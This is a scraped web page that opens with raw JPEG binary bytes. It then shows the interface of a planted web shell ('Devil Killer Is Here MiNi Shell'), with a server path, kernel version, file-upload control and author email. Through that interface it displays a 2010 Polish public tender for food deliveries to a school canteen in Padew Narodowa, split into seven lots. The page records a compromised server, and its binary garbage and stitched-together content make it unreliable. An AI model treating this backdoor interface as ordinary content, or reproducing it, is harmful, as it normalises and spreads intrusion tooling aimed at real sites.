JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100107/4339-N-2010.html

<p class="kh_header"><b>Padew Narodowa: Dostawa artykułów spożywczych dla potrzeb Stołówki Szkolnej przy Publicznym Gimnazjum im. Franciszka Krempy w Padwi Narodowej</b><br>
<b>Numer ogłoszenia: 4339 - 2010; data zamieszczenia: 07.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Gimnazjum w Padwi Narodowej , Padew Narodowa 222A, 39-340 Padew Narodowa, woj. podkarpackie, tel. 0-15 8119301, faks 0-15 8119948.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.padewgimnazjum.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla potrzeb Stołówki Szkolnej przy Publicznym Gimnazjum im. Franciszka Krempy w Padwi Narodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych dla stołówki szkolnej.
Zadanie nr 1
Dostawa pieczywa dla Stołówki Szkolnej w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Chleb duży (0,95 kg)	szt	1 200
2	Bułki zwykłe (0,08 kg)	szt	4 000
3	Rogale	szt	4 000
4	Bułka tarta	kg	200
5	Bułka drożdżowa	szt	1 500
6	Pączki	szt	1 200
7	Mini pizza	szt.	1 200

Zadanie nr 2
Dostawa mięsa i wędlin dla Stołówki Szkolnej w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Kiełbasa zwyczajna wieprzowa	kg	200
2	Wędzonka	kg	80
3	Kości wieprzowe	kg	500
4	Kawałki kurczaka - korpus	kg 	300
5	Schab b)k	kg	700
6	Filet drobiowy	kg	400
7	Karkówka b)k	kg	500
8	Kiełbasa krakowska sucha	kg	50
9	Pasztet firmowy drobiowy	kg 	20
10	Kiełbasa wiejska	kg	70
11	Polędwica sopocka	kg	50
12	Wędzonka krotoszyńska	kg	20
13	Polędwica drobiowa 	kg	18
14	Mięso rosołowe	kg	100
15	Smalec 250g	szt	500
16	Słonina	kg	70
17	Udko z kurczaka	kg.	400
18	Krakowska sucha	kg	20

Zadanie nr 3
Dostawa owoców, warzywa i kiszonek dla Stołówki Szkolnej w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Marchew czerwona korzeń	kg	500
2	Pietruszka korzeń	kg	200
3	Seler korzeń	kg	300
4	Por	szt	200
5	Cebula	kg	500
6	Burak ćwikłowy	kg	240
7	Kapusta biała główki 	szt	70
8	Kapusta pekińska 	szt	150
9	Kapusta włoska	szt	50
10	Ogórek świeży 	kg	100
11	Kalafior świeży	szt	40
12	Ogórki kiszone 	10 kg wiadro	10
13	Kapusta kiszona	10 kg wiadro	50
14	Koperek	pęczek	30
15	Pieczarki	kg	150
16	Czosnek	kg	10
17	Jabłka 	kg	800
18	Cytryny	kg	30
19	Fasola (Jasiek)	kg	100
20	Fasola mała	kg	20
21	Groch żółty	kg	30
22	Ogórki korniszony, 1,7 l	szt	180
23	Pomidor świeży	kg	40


Zadanie nr 4
Dostawa zup, przypraw i dżemów dla Stołówki Szkolnej w Padwi Narodowej

Lp.	                Nazwa	Nazwa JM	Ilość	uwagi
1	                         2	3	4	5
1	Koper suszony 10g	szt	15	
2	Pietruszka suszona 10g	szt	15	
3	Papryka mielona słodka 20g	szt	10	
4	Musztarda 1000g	szt	10	
5	Majonez 2850g	szt	20	Winiary lub równoważne
6	Kwasek cytrynowy 20g	szt	10	
7	Majeranek 10g	szt	10	
8	Ziele angielskie 250g	szt	20	
9	Przyprawa magii 1l	szt	20		
10	Koncentrat pomidorowy 1l	 	szt	40	Pudliszki lub równoważne
11	Liść laurowy 100g	szt	20	
12	Kminek 10g	szt	50	
13	Jarzynka 2300g	szt	16	Winiary lub równoważne
14	Rosół drobiowy 2200g	szt	5	
15	Sos pieczeniowy 1000g	szt	10	
16	Sos pieczarkowy 1000g	szt	10	
17	Sos boloński 1000g	szt	6	
18	Sos grzybowy staropolski 700g	szt	6	
19	Zupa grochowa 1000g	szt	6	
20	Zupa pieczarkowa 600g	szt	6	
21	Zupa grzybowa 800g		szt	6	
22	Barszcz biały 1000g	szt	18	
23	Żur w proszku 1000g	szt	12	
24	Consomme 1200g	szt	10	
25	Olej uniwersalny 5 l 	szt	30	
26	Cukier kryształ 1kg	kg	400	
27	Herbata w ekspresowa (100 saszetek)op	32	Tylos, Cejlon lub równoważne
28	Sól	kg	200	
29	Chrzan w słoiku 180g	op	100	
30	Ocet ?  l	szt	30	
31	Pieprz czarny mielony 500g	szt	10	
32	Dżem wiśniowy 300g	szt	20	
33	Dżem jagodowy 300g	szt	20	
34	Dżem truskawkowy 300g	szt	20	
35	Krem czekoladowy Nutella 780g	szt	30	
36	Sekret szefa 0,9 kg 	szt	10	
37	Suszone pomidory z bazylią i czosnkiem450 g	szt	5	

Zadanie nr 5
Dostawa mąki i artykułów mącznych dla Stołówki Szkolnej w Padwi Narodowej

Lp.   	Nazwa	Nazwa JM	Ilość	    uwagi
 1	2	3	      4	           5
 1	Kasza manna	kg	    30	
 2	Kasza jęczmienna	kg	  150	
 3	Ryż biały	kg	    50	
 4	Makaron gwiazdki 500g	 	op	    15	Lubella lub równoważne
 5	Makaron świderki 500g	op	   450	
 6	Makaron muszelka 500g	op	     30	
 7	Makaron nitka 250g	 	op	   250	Czanecki lub równoważne
 8	Mąka pszenna 1000g	op	120	

Zadanie nr 6
Dostawa nabiału dla Stołówki Szkolnej w Padwi Narodowej

Lp.	                      Nazwa	Nazwa JM	Ilość	  uwagi
 1	                       2	          3	     4	                5
 1	Śmietana 18%  400g	op	800	
 2	Masło    200g	op	800	
 3	Margaryna  250g	op	200	
 4	Ser biały	 	kg	150	
 5	Jajka	szt	6 000	
 6	Ser żółty - salami	kg	40	
 7	Ser żółty - edamski 	kg	20	

Zadanie nr 7
Dostawa mrożonek dla Stołówki Szkolnej w Padwi Narodowej

Lp.	                  Nazwa	Nazwa JM	Ilość	 uwagi
 1	                    2                                                                                                                                                          	        3	     4	               5
1	Paluszki rybne	kg	   140	
2	Filety mintaj	kg	   250	
3	Pierogi ruskie 450g	szt	2 000	SWISS-POL lub równoważne
4	Kalafior mrożony 500g	szt	    12	
5	Mieszanka wielowarzywna 500g	szt	    20	
6	Brukselka 500g	szt	    20	
7	Mintaj kostka w panierce	kg	  150	
8	Fasolka szparagowa 500g	szt	   12	
9	Mieszanka wielowarzywna krojona w paski	szt	   20	
10	Filet z ryby sola	kg	  100	
11	Filet z dorsza	kg	  100.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.11.00.00-2, 15.13.11.30-5, 15.22.00.00-6, 03.20.00.00-3, 03.32.20.00-3, 15.87.00.00-7, 15.83.12.00-4, 15.86.41.00-3, 15.89.10.00-0, 15.41.12.00-4, 03.21.13.00-6, 15.61.00.00-7, 15.85.11.00-9, 03.14.25.00-3, 15.51.00.00-0, 15.53.00.00-2, 15.43.11.00-9, 15.54.00.00-5, 15.61.21.00-2, 15.87.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział oferenci, o których mowa w art. 22 ust. 1, pkt 1-3, nie wykluczeni na podstawie art. 24 ust. 1-2 ustawy o zamówieniach publicznych. Ocena spełniania warunków, o których mowa w w/w artykułach będzie się odbywać na podstawie dostarczonych oświadczeń. Składanie fałszywych informacji i dokumentów będzie podlegało sankcjom prawnym określonym w polskich przepisach prawnych.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.	Na ofertę składają się następujące dokumenty i załączniki:
A.1)	Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1
A.2)	Formularz cenowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1.1 
A.3)	Projekt umowy - załącznik nr 5
A.4)	Informacje o wykonawcy - załącznik nr 4
A.5)	Wymagane oświadczenia - załącznik Nr 2 
B.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
B.1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
B.2)	Dokumenty potwierdzające posiadanie uprawnień lub pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
B.3)	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych. - załącznik nr 2.1
C.	Oświadczenie Wykonawcy w sprawie stosowania się do SIWZ - załącznik nr 2.2
D.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
E.	Zamiast dokumentów, o których mowa w pkt. B.1) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.
F.	Dokumenty wymagane w przypadku składania oferty wspólnej: 
F.1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy
Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B1-B3 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie 
G.	Postanowienia dotyczące składanych dokumentów
G.1)	Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę lub osoby uprawnione do podpisania oferty z dopiskiem -za zgodność z oryginałem-.
G.2)	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.padewgimnazjum.republika.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Gimnazjum im. Franciszka Krempy w Padwi Narodowej
Padew Narodowa 222 A 
39-340 Padew Narodowa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2010 godzina 09:00, miejsce: Publiczne Gimnazjum im. Franciszka Krempy w Padwi Narodowej
Padew Narodowa 222 A 
39-340 Padew Narodowa
sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Chleb duży (0,95 kg)	szt	1 200
2	Bułki zwykłe (0,08 kg)	szt	4 000
3	Rogale	szt	4 000
4	Bułka tarta	kg	200
5	Bułka drożdżowa	szt	1 500
6	Pączki	szt	1 200
7	Mini pizza	szt.	1 200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mięsa i wędlin dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Kiełbasa zwyczajna wieprzowa	kg	200
2	Wędzonka	kg	80
3	Kości wieprzowe	kg	500
4	Kawałki kurczaka - korpus	kg 	300
5	Schab b/k	kg	700
6	Filet drobiowy	kg	400
7	Karkówka b/k	kg	500
8	Kiełbasa krakowska sucha	kg	50
9	Pasztet firmowy drobiowy	kg 	20
10	Kiełbasa wiejska	kg	70
11	Polędwica sopocka	kg	50
12	Wędzonka krotoszyńska	kg	20
13	Polędwica drobiowa 	kg	18
14	Mięso rosołowe	kg	100
15	Smalec 250g	szt	500
16	Słonina	kg	70
17	Udko z kurczaka	kg.	400
18	Krakowska sucha	kg	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa owoców, warzywa i kiszonek dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Marchew czerwona korzeń	kg	500
2	Pietruszka korzeń	kg	200
3	Seler korzeń	kg	300
4	Por	szt	200
5	Cebula	kg	500
6	Burak ćwikłowy	kg	240
7	Kapusta biała główki 	szt	70
8	Kapusta pekińska 	szt	150
9	Kapusta włoska	szt	50
10	Ogórek świeży 	kg	100
11	Kalafior świeży	szt	40
12	Ogórki kiszone 	10 kg wiadro	10
13	Kapusta kiszona	10 kg wiadro	50
14	Koperek	pęczek	30
15	Pieczarki	kg	150
16	Czosnek	kg	10
17	Jabłka 	kg	800
18	Cytryny	kg	30
19	Fasola (Jasiek)	kg	100
20	Fasola mała	kg	20
21	Groch żółty	kg	30
22	Ogórki korniszony, 1,7 l	szt	180
23	Pomidor świeży	kg	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.22.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa zup, przypraw i dżemów dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	                Nazwa	Nazwa JM	Ilość	uwagi
1	                         2	3	4	5
1	Koper suszony 10g	szt	15	
2	Pietruszka suszona 10g	szt	15	
3	Papryka mielona słodka 20g	szt	10	
4	Musztarda 1000g	szt	10	
5	Majonez 2850g	szt	20	Winiary lub równoważne
6	Kwasek cytrynowy 20g	szt	10	
7	Majeranek 10g	szt	10	
8	Ziele angielskie 250g	szt	20	
9	Przyprawa magii 1l	szt	20		
10	Koncentrat pomidorowy 1l	 	szt	40	Pudliszki lub równoważne
11	Liść laurowy 100g	szt	20	
12	Kminek 10g	szt	50	
13	Jarzynka 2300g	szt	16	Winiary lub równoważne
14	Rosół drobiowy 2200g	szt	5	
15	Sos pieczeniowy 1000g	szt	10	
16	Sos pieczarkowy 1000g	szt	10	
17	Sos boloński 1000g	szt	6	
18	Sos grzybowy staropolski 700g	szt	6	
19	Zupa grochowa 1000g	szt	6	
20	Zupa pieczarkowa 600g	szt	6	
21	Zupa grzybowa 800g		szt	6	
22	Barszcz biały 1000g	szt	18	
23	Żur w proszku 1000g	szt	12	
24	Consomme 1200g	szt	10	
25	Olej uniwersalny 5 l 	szt	30	
26	Cukier kryształ 1kg	kg	400	
27	Herbata w ekspresowa /100 saszetek/	op	32	Tylos, Cejlon lub równoważne
28	Sól	kg	200	
29	Chrzan w słoiku 180g	op	100	
30	Ocet ?  l	szt	30	
31	Pieprz czarny mielony 500g	szt	10	
32	Dżem wiśniowy 300g	szt	20	
33	Dżem jagodowy 300g	szt	20	
34	Dżem truskawkowy 300g	szt	20	
35	Krem czekoladowy Nutella 780g	szt	30	
36	Sekret szefa 0,9 kg 	szt	10	
37	Suszone pomidory z bazylią i czosnkiem450 g	szt	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.20.00-1, 15.83.12.00-4, 15.86.41.00-3, 15.89.10.00-0, 15.41.12.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mąki i artykułów mącznych dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.   	Nazwa	Nazwa JM	Ilość	    uwagi
 1	2	3	      4	           5
 1	Kasza manna	kg	    30	
 2	Kasza jęczmienna	kg	  150	
 3	Ryż biały	kg	    50	
 4	Makaron gwiazdki 500g	 	op	    15	Lubella lub równoważne
 5	Makaron świderki 500g	op	   450	
 6	Makaron muszelka 500g	op	     30	
 7	Makaron nitka 250g	 	op	   250	Czanecki lub równoważne
 8	Mąka pszenna 1000g	op	120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7, 15.61.21.00-2, 15.85.11.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa nabiału dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	                      Nazwa	Nazwa JM	Ilość	  uwagi
 1	                       2	          3	     4	                5
 1	Śmietana 18%  400g	op	800	
 2	Masło    200g	op	800	
 3	Margaryna  250g	op	200	
 4	Ser biały	 	kg	150	
 5	Jajka	szt	6 000	
 6	Ser żółty - salami	kg	40	
 7	Ser żółty - edamski 	kg	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-0, 03.14.25.00-3, 15.53.00.00-2, 15.43.11.00-9, 15.54.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa mrożonek dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Paluszki rybne	kg	   140	
2	Filety mintaj	kg	   250	
3	Pierogi ruskie 450g	szt	2 000	SWISS-POL lub równoważne
4	Kalafior mrożony 500g	szt	    12	
5	Mieszanka wielowarzywna 500g	szt	    20	
6	Brukselka 500g	szt	    20	
7	Mintaj kostka w panierce	kg	  150	
8	Fasolka szparagowa 500g	szt	   12	
9	Mieszanka wielowarzywna krojona w paski	szt	   20	
10	Filet z ryby sola	kg	  100	
11	Filet z dorsza	kg	  100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com